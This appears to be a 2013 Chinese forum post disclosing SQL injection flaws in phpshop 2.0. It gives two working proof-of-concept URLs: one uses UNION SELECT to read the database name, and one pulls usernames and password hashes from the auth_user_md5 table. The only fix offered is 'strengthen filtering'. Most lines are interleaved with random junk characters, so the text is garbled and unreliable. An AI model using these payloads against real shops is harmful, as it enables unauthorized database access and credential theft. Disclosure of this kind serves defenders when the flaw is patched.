标题 : phpshop 2.0 SQL Injection Vulnerability
3 k% O% m1 V% s: @: Q d; r2 ]" i
作者 : By onestree, X7 x; W& Y; k* E6 U3 x b
下载地址 : http://code.google.com/p/phpshop/downloads/list3 k' D4 s2 |: u+ p9 Z
测试地址: windows 7 / ubuntu
2 B' o$ F. W6 K& j, i: F5 {0 z: j 6 T' ^$ J* W" [8 p0 Q
2 l* V6 j4 q; F- \# OSQLi p0c:
' C& x" e& u) i ! {5 s7 ]; g V4 Q
==================9 s4 ~+ {, Y1 @0 V7 T0 R
) U9 _1 q5 a* \' g% ^
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
) t* M( g" v9 V; Ounion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --: d2 {: x2 t7 `: l5 J" r; K
, v' G! L4 S6 z4 J9 V4 ~" Q
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
! P$ ]3 \# l9 _
; Q; Q, f3 V! G! }1 x6 P, {8 [0 d修复:
' i( k& w: J7 J& R* f, K加强过滤
# ^* K% a$ h7 L7 S6 G4 a6 D4 r. |4 `2 x4 |* U/ O% Z+ Y
* t) d. |* b$ h6 J4 S |
发表于 2013-1-18 18:24:10
收藏
支持
反对